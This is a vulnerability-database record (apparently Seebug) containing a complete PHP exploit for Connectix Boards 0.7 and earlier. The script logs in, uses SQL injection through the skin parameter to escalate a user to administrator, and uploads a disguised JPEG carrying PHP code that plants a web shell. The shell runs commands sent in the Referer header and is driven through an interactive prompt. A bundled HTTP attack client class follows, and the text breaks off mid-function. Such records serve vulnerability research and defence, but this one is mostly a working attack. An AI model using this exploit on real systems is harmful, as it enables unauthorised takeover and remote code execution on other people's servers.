Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-6248", "status": "poc", "bulletinFamily": "exploit", "modified": "2007-02-23T00:00:00", "title": "Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-6248", "cvelist": [], "description": "No description provided by source.", "viewCount": 5, "published": "2007-02-23T00:00:00", "sourceData": "\n #!/usr/bin/php\r\n<?php\r\nerror_reporting(E_ALL ^ E_NOTICE);\r\n\r\nif($argc < 9) {\r\nprint(\\\"\r\n Connectix Boards <= 0.7 (p_skin) Multiple Vulnerabilities Exploit\r\n-------------------------------------------------------------------\r\nPHP conditions: none\r\n Credits: DarkFig <gmdarkfig@gmail.com>\r\n URL: http://www.acid-root.new.fr/\r\n-------------------------------------------------------------------\r\n Usage: $argv[0] -url <> -usr <> -pwd <> -type <> [Options]\r\n Params: -url For example http://victim.com/connectix/ \r\n -usr The username of your account\r\n -pwd The password of your account\r\n -type Privilege Escalation(1) or Code execution(2)\r\nOptions: -proxy If you wanna use a proxy <proxyhost:proxyport> \r\n -proxyauth Basic authentification <proxyuser:proxypwd> \r\n-------------------------------------------------------------------\r\n\\\"); exit(1);\r\n}\r\n\r\n$url = getparam(\\'url\\',1);\r\n$user = getparam(\\'usr\\',1);\r\n$pass = getparam(\\'pwd\\',1);\r\n$type = getparam(\\'type\\',1);\r\n$proxy = getparam(\\'proxy\\');\r\n$authp = getparam(\\'proxyauth\\');\r\n$theme = \\'Zephyr\\';\r\n\r\n$xpl = new phpsploit();\r\n$xpl->agent(\\\"Mozilla Firefox\\\");\r\n$xpl->allowredirection(1);\r\n$xpl->cookiejar(1);\r\nif($proxy) $xpl->proxy($proxy);\r\nif($authp) $xpl->proxyauth($authp);\r\n\r\nprint \\\"\r\nTrying to get logged in\\\";\r\n$xpl->post($url.\\'index.php?act=login\\',\\\"username=$user&password=$pass&remember=on&confirm=Connexion+%21\\\");\r\nif(preg_match(\\\"#password#\\\",$xpl->showcookie())) print \\\"\r\nLogged in\\\";\r\nelse exit(\\\"\r\nExploit failed\\\");\r\n\r\nsploit(\\\", usr_class=1\\\");\r\nif($type==1) exit(\\\"\r\nDone, $user is now admin.\\\");\r\n\r\n# Fake JPG (with php code) generated with edjpgcom.exe\r\n#\r\n# <?php $handle=fopen(\\'mdrpipicacalolxdwtf.gif.php\\',\\'w+\\');\r\n# fwrite($handle,\\'<?php @system($_SERVER[HTTP_REFERER]); ?/>\\');\r\n# fclose($handle); unlink($_SERVER[PHP_SELF]); ?/>\r\n#\r\n$f = \\\"xFFxD8xFFxE0x00x10x4Ax46x49x46x00x01x01x01x00x60x00x60x00x00xFF\\\"\r\n .\\\"xDBx00x43x00x08x06x06x07x06x05x08x07x07x07x09x09x08x0Ax0Cx14\\\"\r\n .\\\"x0Dx0Cx0Bx0Bx0Cx19x12x13x0Fx14x1Dx1Ax1Fx1Ex1Dx1Ax1Cx1Cx20x24\\\"\r\n .\\\"x2Ex27x20x22x2Cx23x1Cx1Cx28x37x29x2Cx30x31x34x34x34x1Fx27x39\\\"\r\n .\\\"x3Dx38x32x3Cx2Ex33x34x32xFFxDBx00x43x01x09x09x09x0Cx0Bx0Cx18\\\"\r\n .\\\"x0Dx0Dx18x32x21x1Cx21x32x32x32x32x32x32x32x32x32x32x32x32x32\\\"\r\n .\\\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32\\\"\r\n .\\\"x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32x32xFFxFEx00\\\"\r\n .\\\"xA5x3Cx3Fx70x68x70x20x24x68x61x6Ex64x6Cx65x3Dx66x6Fx70x65x6E\\\"\r\n .\\\"x28x27x6Dx64x72x70x69x70x69x63x61x63x61x6Cx6Fx6Cx78x64x77x74\\\"\r\n .\\\"x66x2Ex67x69x66x2Ex70x68x70x27x2Cx27x77x2Bx27x29x3Bx66x77x72\\\"\r\n .\\\"x69x74x65x28x24x68x61x6Ex64x6Cx65x2Cx27x3Cx3Fx70x68x70x20x40\\\"\r\n .\\\"x73x79x73x74x65x6Dx28x24x5Fx53x45x52x56x45x52x5Bx48x54x54x50\\\"\r\n .\\\"x5Fx52x45x46x45x52x45x52x5Dx29x3Bx20x3Fx3Ex27x29x3Bx66x63x6C\\\"\r\n .\\\"x6Fx73x65x28x24x68x61x6Ex64x6Cx65x29x3Bx20x75x6Ex6Cx69x6Ex6B\\\"\r\n .\\\"x28x24x5Fx53x45x52x56x45x52x5Bx50x48x50x5Fx53x45x4Cx46x5Dx29\\\"\r\n .\\\"x3Bx20x3Fx3ExFFxC0x00x11x08x00x01x00x01x03x01x22x00x02x11x01\\\"\r\n .\\\"x03x11x01xFFxC4x00x1Fx00x00x01x05x01x01x01x01x01x01x00x00x00\\\"\r\n .\\\"x00x00x00x00x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5\\\"\r\n .\\\"x10x00x02x01x03x03x02x04x03x05x05x04x04x00x00x01x7Dx01x02x03\\\"\r\n .\\\"x00x04x11x05x12x21x31x41x06x13x51x61x07x22x71x14x32x81x91xA1\\\"\r\n .\\\"x08x23x42xB1xC1x15x52xD1xF0x24x33x62x72x82x09x0Ax16x17x18x19\\\"\r\n .\\\"x1Ax25x26x27x28x29x2Ax34x35x36x37x38x39x3Ax43x44x45x46x47x48\\\"\r\n .\\\"x49x4Ax53x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74\\\"\r\n .\\\"x75x76x77x78x79x7Ax83x84x85x86x87x88x89x8Ax92x93x94x95x96x97\\\"\r\n .\\\"x98x99x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9\\\"\r\n .\\\"xBAxC2xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE1\\\"\r\n .\\\"xE2xE3xE4xE5xE6xE7xE8xE9xEAxF1xF2xF3xF4xF5xF6xF7xF8xF9xFAxFF\\\"\r\n .\\\"xC4x00x1Fx01x00x03x01x01x01x01x01x01x01x01x01x00x00x00x00x00\\\"\r\n .\\\"x00x01x02x03x04x05x06x07x08x09x0Ax0BxFFxC4x00xB5x11x00x02x01\\\"\r\n .\\\"x02x04x04x03x04x07x05x04x04x00x01x02x77x00x01x02x03x11x04x05\\\"\r\n .\\\"x21x31x06x12x41x51x07x61x71x13x22x32x81x08x14x42x91xA1xB1xC1\\\"\r\n .\\\"x09x23x33x52xF0x15x62x72xD1x0Ax16x24x34xE1x25xF1x17x18x19x1A\\\"\r\n .\\\"x26x27x28x29x2Ax35x36x37x38x39x3Ax43x44x45x46x47x48x49x4Ax53\\\"\r\n .\\\"x54x55x56x57x58x59x5Ax63x64x65x66x67x68x69x6Ax73x74x75x76x77\\\"\r\n .\\\"x78x79x7Ax82x83x84x85x86x87x88x89x8Ax92x93x94x95x96x97x98x99\\\"\r\n .\\\"x9AxA2xA3xA4xA5xA6xA7xA8xA9xAAxB2xB3xB4xB5xB6xB7xB8xB9xBAxC2\\\"\r\n .\\\"xC3xC4xC5xC6xC7xC8xC9xCAxD2xD3xD4xD5xD6xD7xD8xD9xDAxE2xE3xE4\\\"\r\n .\\\"xE5xE6xE7xE8xE9xEAxF2xF3xF4xF5xF6xF7xF8xF9xFAxFFxDAx00x0Cx03\\\"\r\n .\\\"x01x00x02x11x03x11x00x3Fx00xF7xFAx28xA2x80x3FxFFxD9\\\";\r\n\r\n# +admin.bbcode.php\r\n# |\r\n# 95. if(isset($_POST[\\'wherefile\\'])) {\r\n# 96. if ($_POST[\\'wherefile\\']==\\'upload\\') {\r\n# 97. if (!empty($_FILES[\\'uploadimage\\'][\\'size\\'])){\r\n# 98. if ($image=getimagesize(trim($_FILES[\\'uploadimage\\'][\\'tmp_name\\']))) {\r\n# 99. $val = array(IMAGETYPE_GIF,IMAGETYPE_JPEG,IMAGETYPE_PNG);\r\n# 100. if ($_FILES[\\'uploadimage\\'][\\'size\\'] <= 20480 && in_array($image[2],$val)) {\r\n# 101. $filename = $smile->smiley_librariesdir.$_POST[\\'sm_filenameserver\\'];\r\n# 102. $filename = str_replace(\\'../\\',\\'\\',trim($filename));\r\n# 103. //si le filenameserver contient un dossier : on cr?e ce dossier:\r\n# 104. mkdirs($smile->smiley_dir.dirname($filename));\r\n# 105. if (move_uploaded_file($_FILES[\\'uploadimage\\'][\\'tmp_name\\'], $smile->smiley_dir.$_POST[\\'sm_filenameserver\\'])) {\r\n# 106. $do=true;\r\n# 107. }\r\n#\r\n$arr = array(frmdt_url => $url.\\'admin.php?act=bb&sub=4\\',\r\n \\\"sm_name\\\" => \\\":AbCdEfGhIj1234dsupersmilepowaa:\\\",\r\n \\\"sm_filenamesubdir\\\" => \\\"libraries/\\\",\r\n \\\"sm_filenameserver\\\" => \\\"xd.gif.php\\\",\r\n \\\"wherefile\\\" => \\\"upload\\\",\r\n \\\"sm_send\\\" => \\\"Confirmer\\\",\r\n \\\"uploadimage\\\" => array(frmdt_type => \\\"image/gif\\\",\r\n frmdt_filename => \\\"xd.gif.php\\\",\r\n frmdt_content => $f));\r\n$xpl->formdata($arr);\r\n$xpl->get($url.\\\"smileys/xd.gif.php\\\");\r\nprint \\\"\r\n$shell> \\\";\r\n\r\nwhile(!preg_match(\\\"#^(quit|exit)$#\\\",($cmd = trim(fgets(STDIN)))))\r\n{\r\n $xpl->addheader(\\\"Referer\\\",$cmd);\r\n $xpl->get($url.\\\"smileys/mdrpipicacalolxdwtf.gif.php\\\");\r\n print $xpl->getcontent().\\\"\r\n$shell> \\\";\r\n} \r\n\r\nfunction sploit($sql)\r\n{\r\n\tglobal $url,$xpl,$theme,$user;\r\n\t$pdat = \\\"changeparams=1\\\"\r\n .\\\"&p_usrs=20\\\"\r\n .\\\"&p_topics=20\\\"\r\n .\\\"&p_msgs=15\\\"\r\n .\\\"&p_res=12\\\"\r\n .\\\"&p_skin=$theme\\\"\r\n .\\\"%00\\',usr_pref_skin=\\'$theme\\',usr_signature=(SELECT \\'[XPL_IS_OK]\\')$sql WHERE usr_name=\\'$user\\' #\\\"\r\n .\\\"&p_lang=fr\\\"\r\n .\\\"&p_timezone=1\\\";\r\n\r\n # +common.php\r\n # |\r\n # 95. function cleanArray(&$arr) {\r\n # 96.\tif (!empty($arr) && is_array($arr)) {\r\n # 97.\t\tforeach($arr as $k => $v) {\r\n # 98.\t\t\tif (is_array($v)) cleanArray($arr[$k]);\r\n # 99.\t\t\telse $arr[$k] = stripslashes($v);\r\n # 100.\t\t}\r\n # 101.\t}\r\n # 102. }\r\n # |\r\n # 105. if (get_magic_quotes_gpc()) {\r\n # 106.\tcleanArray($_POST);\r\n # 107.\tcleanArray($_COOKIE);\r\n # 108.\tcleanArray($_GET);\r\n # 109. }\r\n #\r\n # +part.userprofile.php\r\n # |\r\n # 305. /* Changement des param?tres d\\'affichage (pas accessible par les modos ou admins) */\r\n # 306. } elseif (isset($_POST[\\'changeparams\\']) && $edit_id==$_SESSION[\\'userid\\']) {\r\n # 307. if ( isset($_POST[\\'p_usrs\\'],$_POST[\\'p_topics\\'],$_POST[\\'p_msgs\\'],$_POST[\\'p_res\\'],$_POST[\\'p_skin\\'],$_POST[\\'p_lang\\'],$_POST[\\'p_timezone\\']) ) {\r\n # 308. if (is_numeric($_POST[\\'p_usrs\\']) && is_numeric($_POST[\\'p_topics\\']) && is_numeric($_POST[\\'p_msgs\\']) && is_numeric($_POST[\\'p_res\\']) && isLang($_POST[\\'p_lang\\']) && isSkin($_POST[\\'p_skin\\'])) {\r\n # 309. if ((int)$_POST[\\'p_usrs\\']>=5 && (int)$_POST[\\'p_usrs\\']<=50 && (int)$_POST[\\'p_topics\\']>=5 && (int)$_POST[\\'p_topics\\']<=50 && (int)$_POST[\\'p_msgs\\']>=5 && (int)$_POST[\\'p_msgs\\']<=50 && (int)$_POST[\\'p_res\\']>=5 && (int)$_POST[\\'p_res\\']<=50 && in_array($_POST[\\'p_timezone\\'],array_keys($timezones))) {\r\n # 310. $GLOBALS[\\'cb_db\\']->query(\\\"UPDATE \\\".$GLOBALS[\\'cb_db\\']->prefix.\\\"users SET usr_pref_msgs=\\'\\\".(int)$_POST[\\'p_msgs\\'].\\\"\\',usr_pref_usrs=\\'\\\".(int)$_POST[\\'p_usrs\\'].\\\"\\',usr_pref_topics=\\'\\\".(int)$_POST[\\'p_topics\\'].\\\"\\',usr_pref_res=\\'\\\".(int)$_POST[\\'p_res\\'].\\\"\\',usr_pref_lang=\\'\\\".$_POST[\\'p_lang\\'].\\\"\\',usr_pref_skin=\\'\\\".$_POST[\\'p_skin\\'].\\\"\\',usr_pref_timezone=\\'\\\".$_POST[\\'p_timezone\\'].\\\"\\',usr_pref_ctsummer=\\\".((int)(isset($_POST[\\'p_ctsummer\\']) && $_POST[\\'p_ctsummer\\']==\\'on\\')).\\\" WHERE usr_id=\\\".$_SESSION[\\'cb_user\\']->userid);\r\n # 311. $_SESSION[\\'cb_user\\']->reloadnext=true;\r\n # 312. redirect(manage_url(\\'index.php?act=user&editprofile=\\'.$_SESSION[\\'userid\\'].\\'&page=6\\',\\'forum-profile\\'.$_SESSION[\\'userid\\'].\\'-params.html\\'));\r\n #\r\n # +lib.cb.php\r\n # |\r\n # 117. function isLang ($langtype) {\r\n # 118.\treturn is_dir(CB_PATH.\\'lang/\\'.$langtype);\r\n # 119. }\r\n # |\r\n # 133. function isSkin ($skintype) {\r\n # 134.\treturn is_dir(CB_PATH.\\'skins/\\'.$skintype);\r\n # 135. }\r\n $xpl->post($url.\\\"index.php?act=user&editprofile=-1&page=6\\\",$pdat);\r\n $xpl->get($url.\\\"index.php?act=user&editprofile=-1&page=5\\\");\r\n \r\n if(preg_match(\\'#[XPL_IS_OK]#\\',$xpl->getcontent())) return;\r\n else exit(\\\"Exploit failed\\\");\r\n}\r\n\r\nfunction getparam($param,$opt=\\'\\')\r\n{\r\n\tglobal $argv;\r\n\tforeach($argv as $value => $key)\r\n\t{\r\n\t\tif($key == \\'-\\'.$param) return $argv[$value+1];\r\n\t}\r\n\tif($opt) exit(\\\"\r\n-$param parameter required\\\");\r\n\telse return;\r\n}\r\n\r\n/*\r\n * \r\n * Copyright (C) darkfig\r\n * \r\n * This program is free software; you can redistribute it and/or \r\n * modify it under the terms of the GNU General Public License \r\n * as published by the Free Software Foundation; either version 2 \r\n * of the License, or (at your option) any later version. \r\n * \r\n * This program is distributed in the hope that it will be useful, \r\n * but WITHOUT ANY WARRANTY; without even the implied warranty of \r\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \r\n * GNU General Public License for more details. \r\n * \r\n * You should have received a copy of the GNU General Public License \r\n * along with this program; if not, write to the Free Software \r\n * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\r\n * \r\n * TITLE: PhpSploit Class\r\n * REQUIREMENTS: PHP 5 (remove \\\"private\\\", \\\"public\\\" if you have PHP 4)\r\n * VERSION: 1.2\r\n * LICENSE: GNU General Public License\r\n * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt\r\n * FILENAME: phpsploitclass.php\r\n *\r\n * CONTACT: gmdarkfig@gmail.com (french / english)\r\n * GREETZ: Sparah, Ddx39\r\n *\r\n * DESCRIPTION:\r\n * The phpsploit is a class implementing a web user agent.\r\n * You can add cookies, headers, use a proxy server with (or without) a\r\n * basic authentification. It supports the GET and the POST method. It can\r\n * also be used like a browser with the cookiejar() function (which allow\r\n * a server to add several cookies for the next requests) and the\r\n * allowredirection() function (which allow the script to follow all\r\n * redirections sent by the server). It can return the content (or the\r\n * headers) of the request. Others useful functions can be used for debugging.\r\n * A manual is actually in development but to know how to use it, you can\r\n * read the comments.\r\n *\r\n * CHANGELOG:\r\n * [2007-01-24] (1.2)\r\n * * Bug #2 fixed: Problem concerning the getcookie() function ((|;))\r\n * * New: multipart/form-data enctype is now supported \r\n *\r\n * [2006-12-31] (1.1)\r\n * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)\r\n * * New: You can now call the getheader() / getcontent() function without parameters\r\n *\r\n * [2006-12-30] (1.0)\r\n * * First version\r\n * \r\n */\r\n\r\nclass phpsploit {\r\n\r\n\t/**\r\n\t * This function is called by the get()/post() functions.\r\n\t * You don\\'t have to call it, this is the main function.\r\n\t *\r\n\t * @return $server_response\r\n\t */\r\n\tprivate function sock()\r\n\t{\r\n\t\tif(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);\r\n\t\telse $socket = fsockopen($this->host,$this->port);\r\n\t\t\r\n\t\tif(!$socket) die(\\\"Error: The host doesn\\'t exist\\\");\r\n\t\t\r\n\t\tif($this->method===\\\"get\\\") $this->packet = \\\"GET \\\".$this->url.\\\" HTTP/1.1\r\n\\\";\r\n\t\telseif($this->method===\\\"post\\\" or $this->method===\\\"formdata\\\") $this->packet = \\\"POST \\\".$this->url. \\\" HTTP/1.1\r\n\\\";\r\n\t\telse die(\\\"Error: Invalid method\\\");\r\n\t\t\r\n\t\tif(!empty($this->proxyuser)) $this->packet .= \\\"Proxy-Authorization: Basic \\\".base64_encode($this->proxyuser.\\\":\\\".$this->proxypass).\\\"\r\n\\\";\r\n\t\t$this->packet .= \\\"Host: \\\".$this->host.\\\"\r\n\\\";\r\n\t\t\r\n\t\tif(!empty($this->agent)) $this->packet .= \\\"User-Agent: \\\".$this->agent.\\\"\r\n\\\";\r\n\t\tif(!empty($this->header)) $this->packet .= $this->header.\\\"\r\n\\\";\r\n\t\tif(!empty($this->cookie)) $this->packet .= \\\"Cookie: \\\".$this->cookie.\\\"\r\n\\\";\r\n\t\t\r\n\t\t$this->packet .= \\\"Connection: Close\r\n\\\";\r\n\t\tif($this->method===\\\"post\\\")\r\n\t\t{\r\n\t\t\t$this->packet .= \\\"Content-Type: application/x-www-form-urlencoded\r\n\\\";\r\n\t\t\t$this->packet .= \\\"Content-Length: \\\".strlen($this->data).\\\"\r\n\r\n\\\";\r\n\t\t\t$this->packet .= $this->data.\\\"\r\n\\\";\r\n\t\t}\r\n\t\telseif($this->method===\\\"formdata\\\")\r\n\t\t{\r\n\t\t\t$this->packet .= \\\"Content-Type: multipart/form-data; boundary=---------------------------\\\".$this->boundary.\\\"\r\n\\\";\r\n\t\t\t$this->packet .= \\\"Content-Length: \\\".strlen($this->data).\\\"\r\n\r\n\\\";\r\n\t\t\t$this->packet .= $this->data;\r\n\t\t}\r\n\t\t$this->packet .= \\\"\r\n\\\";\r\n\t\t$this->recv = \\'\\';\r\n\t\t\r\n\t\tfputs($socket,$this->packet);\r\n\t\twhile(!feof($socket)) $this->recv .= fgets($socket);\r\n\t\tfclose($socket);\r\n\t\t\r\n\t\tif($this->cookiejar) $this->cookiejar($this->getheader($this->recv));\r\n\t\tif($this->allowredirection) return $this->allowredirection($this->recv);\r\n\t\telse return $this->recv;\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to add several cookie in the\r\n\t * request. Several methods are supported:\r\n\t * \r\n\t * $this->addcookie(\\\"name\\\",\\\"value\\\");\r\n\t * or\r\n\t * $this->addcookie(\\\"name=newvalue\\\");\r\n\t * or\r\n\t * $this->addcookie(\\\"othername=overvalue; xx=zz; y=u\\\");\r\n\t * \r\n\t * @param string $cookiename\r\n\t * @param string $cookievalue\r\n\t * \r\n\t */\r\n\tpublic function addcookie($cookn,$cookv=\\'\\')\r\n\t{\r\n\t\t// $this->addcookie(\\\"name\\\",\\\"value\\\"); work avec replace\r\n\t\tif(!empty($cookv))\r\n\t\t{\r\n\t\t\tif($cookv === \\\"deleted\\\") $cookv=\\'\\'; // cookiejar(1) && Set-Cookie: name=delete\r\n\t\t\tif(!empty($this->cookie))\r\n\t\t\t{\r\n\t\t\t if(preg_match(\\\"/$cookn=/\\\",$this->cookie))\r\n\t\t\t {\r\n\t\t\t \t$this->cookie = preg_replace(\\\"/$cookn=(S*);/\\\",\\\"$cookn=$cookv;\\\",$this->cookie);\r\n\t\t\t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$this->cookie .= \\\" \\\".$cookn.\\\"=\\\".$cookv.\\\";\\\"; // \\\" \\\".\r\n\t\t\t }\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->cookie = $cookn.\\\"=\\\".$cookv.\\\";\\\";\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addcookie(\\\"name=value; othername=othervalue\\\");\r\n\t\telse\r\n\t\t{\r\n\t \t if(!empty($this->cookie))\r\n\t \t {\r\n\t \t \t$cookn = preg_replace(\\\"/(.*);$/\\\",\\\"$1\\\",$cookn);\r\n\t \t \t$cookarr = explode(\\\";\\\",str_replace(\\\" \\\", \\\"\\\",$cookn));\r\n\t \t \tfor($i=0;$i<count($cookarr);$i++)\r\n\t \t \t{\r\n\t \t \t\tpreg_match(\\\"/(S*)=(S*)/\\\",$cookarr[$i],$matches);\r\n\t \t \t\t$cookn = $matches[1];\r\n\t \t \t\t$cookv = $matches[2];\r\n\t \t \t\t$this->addcookie($cookn,$cookv);\r\n\t \t \t}\r\n\t \t }\r\n\t\t\t else\r\n\t\t\t {\r\n\t\t\t \t$cookn = ((substr($cookn,(strlen($cookn)-1),1))===\\\";\\\") ? $cookn : $cookn.\\\";\\\";\r\n\t\t\t \t$this->cookie = $cookn;\t\t\t\r\n\t\t\t }\r\n\t\t}\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function allows you to add several headers in the\r\n\t * request. Several methods are supported:\r\n\t *\r\n\t * $this->addheader(\\\"headername\\\",\\\"headervalue\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"headername: headervalue\\\");\r\n\t *\r\n\t * @param string $headername\r\n\t * @param string $headervalue\r\n\t */\r\n\tpublic function addheader($headern,$headervalue=\\'\\')\r\n\t{\r\n\t\t// $this->addheader(\\\"name\\\",\\\"value\\\");\r\n\t\tif(!empty($headervalue))\r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\tif(preg_match(\\\"/$headern:/\\\",$this->header))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header = preg_replace(\\\"/$headern: (S*)/\\\",\\\"$headern: $headervalue\\\",$this->header);\r\n\t\t\t\t}\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->header .= \\\"\r\n\\\".$headern.\\\": \\\".$headervalue;\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern.\\\": \\\".$headervalue;\r\n\t\t\t}\r\n\t\t}\r\n\t\t// $this->addheader(\\\"name: value\\\");\r\n\t\telse \r\n\t\t{\r\n\t\t\tif(!empty($this->header))\r\n\t\t\t{\r\n\t\t\t\t$headarr = explode(\\\": \\\",$headern);\r\n\t\t\t\t$headern = $headarr[0];\r\n\t\t\t\t$headerv = $headarr[1];\r\n\t\t\t\t$this->addheader($headern,$headerv);\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\t$this->header=$headern;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server.\r\n\t * Several methods are supported:\r\n\t * \r\n\t * $this->proxy(\\\"proxyip\\\",\\\"8118\\\");\r\n\t * or\r\n\t * $this->proxy(\\\"proxyip:8118\\\")\r\n\t *\r\n\t * @param string $proxyhost\r\n\t * @param integer $proxyport\r\n\t */\r\n\tpublic function proxy($proxy,$proxyp=\\'\\')\r\n\t{\r\n\t\t// $this->proxy(\\\"localhost:8118\\\");\r\n\t\tif(empty($proxyp))\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/^(S*):(d+)$/\\\",$proxy,$proxarr);\r\n\t\t\t$proxh = $proxarr[1];\r\n\t\t\t$proxp = $proxarr[2];\r\n\t\t\t$this->proxyhost=$proxh;\r\n\t\t\t$this->proxyport=$proxp;\r\n\t\t}\r\n\t\t// $this->proxy(\\\"localhost\\\",8118);\r\n\t\telse \r\n\t\t{\r\n\t\t\t$this->proxyhost=$proxy;\r\n\t\t\t$this->proxyport=intval($proxyp);\r\n\t\t}\r\n\t\tif($this->proxyport > 65535) die(\\\"Error: Invalid port number\\\");\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function allows you to use an http proxy server\r\n\t * which requires a basic authentification. Several\r\n\t * methods are supported:\r\n\t * \r\n\t * $this->proxyauth(\\\"darkfig\\\",\\\"dapasswd\\\");\r\n\t * or\r\n\t * $this->proxyauth(\\\"darkfig:dapasswd\\\");\r\n\t *\r\n\t * @param string $proxyuser\r\n\t * @param string $proxypass\r\n\t */\r\n\tpublic function proxyauth($proxyauth,$proxypasse=\\'\\')\r\n\t{\r\n\t\t// $this->proxyauth(\\\"darkfig:password\\\");\r\n\t\tif(empty($proxypasse))\r\n\t\t{\r\n\t\t\tpreg_match(\\\"/^(.*):(.*)$/\\\",$proxyauth,$proxautharr);\r\n\t\t\t$proxu = $proxautharr[1];\r\n\t\t\t$proxp = $proxautharr[2];\r\n\t\t\t$this->proxyuser=$proxu;\r\n\t\t\t$this->proxypass=$proxp;\r\n\t\t}\r\n\t\t// $this->proxyauth(\\\"darkfig\\\",\\\"password\\\");\r\n\t\telse\r\n\t\t{\r\n\t\t\t$this->proxyuser=$proxyauth;\r\n\t\t\t$this->proxypass=$proxypasse;\r\n\t\t}\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function allows you to set the \\\"User-Agent\\\" header.\r\n\t * Several methods are possible to do that:\r\n\t * \r\n\t * $this->agent(\\\"Mozilla Firefox\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"User-Agent: Mozilla Firefox\\\");\r\n\t * or\r\n\t * $this->addheader(\\\"User-Agent\\\",\\\"Mozilla Firefox\\\");\r\n\t * \r\n\t * @param string $useragent\r\n\t */\r\n\tpublic function agent($useragent)\r\n\t{\r\n\t\t$this->agent=$useragent;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the header which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showheader();\r\n\t *\r\n\t * @return $header\r\n\t */\r\n\tpublic function showheader()\r\n\t{\r\n\t\treturn $this->header;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the cookie which will be\r\n\t * in the next request.\r\n\t * \r\n\t * $this->showcookie();\r\n\t *\r\n\t * @return $storedcookies\r\n\t */\r\n\tpublic function showcookie()\r\n\t{\r\n\t\treturn $this->cookie;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function returns the last formed\r\n\t * http request (the http packet).\r\n\t * \r\n\t * $this->showlastrequest();\r\n\t * \r\n\t * @return $last_http_request\r\n\t */\r\n\tpublic function showlastrequest()\r\n\t{\r\n\t\treturn $this->packet;\r\n\t}\r\n\t\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * GET method. You can precise the port of the host.\r\n\t * \r\n\t * $this->get(\\\"http://localhost\\\");\r\n\t * $this->get(\\\"http://localhost:888/xd/tst.php\\\");\r\n\t * \r\n\t * @param string $urlwithpath\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function get($url)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\\\"get\\\";\r\n\t\treturn $this->sock();\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method. You can precise the port of the host.\r\n\t * \r\n\t * $this->post(\\\"http://localhost/index.php\\\",\\\"admin=1&user=dark\\\");\r\n\t *\r\n\t * @param string $urlwithpath\r\n\t * @param string $postdata\r\n\t * @return $server_response\r\n\t */\t\r\n\tpublic function post($url,$data)\r\n\t{\r\n\t\t$this->target($url);\r\n\t\t$this->method=\\\"post\\\";\r\n\t\t$this->data=$data;\r\n\t\treturn $this->sock();\r\n\t}\r\n\t\r\n\r\n\t/**\r\n\t * This function sends the formed http packet with the\r\n\t * POST method using the multipart/form-data enctype. \r\n\t * \r\n\t * $array = array(\r\n\t * frmdt_url => \\\"http://localhost/upload.php\\\",\r\n\t * frmdt_boundary => \\\"123456\\\", # Optional\r\n\t * \\\"email\\\" => \\\"me@u.com\\\",\r\n\t * \\\"varname\\\" => array(\r\n\t * frmdt_type => \\\"image/gif\\\", # Optional\r\n\t * frmdt_transfert => \\\"binary\\\", # Optional\r\n\t * frmdt_filename => \\\"hello.php\\\",\r\n\t * frmdt_content => \\\"<?php echo \\':)\\'; ?>\\\"));\r\n\t * $this->formdata($array);\r\n\t *\r\n\t * @param array $array\r\n\t * @return $server_response\r\n\t */\r\n\tpublic function formdata($array)\r\n\t{\r\n\t\t$this->target($array[frmdt_url]);\r\n\t\t$this->method=\\\"formdata\\\";\r\n\t\t$this->data=\\'\\';\r\n\t\tif(!isset($array[frmdt_boundary])) $this->boundary=\\\"phpsploit\\\";\r\n\t\telse $this->boundary=$array[frmdt_boundary];\r\n\t\tforeach($array as $key => $value)\r\n\t\t{\r\n\t\t\tif(!preg_match(\\\"#^frmdt_(boundary|url)#\\\",$key))\r\n\t\t\t{\r\n\t\t\t\t$this->data .= \\\"-----------------------------\\\".$this->boundary.\\\"\r\n\\\";\r\n\t\t\t\t$this->data .= \\\"Content-Disposition: form-data; name=\\\"\\\".$key.\\\"\\\";\\\";\r\n\t\t\t\tif(!is_array($value))\r\n\t\t\t\t{\r\n\t\t\t\t\t$this->data .= 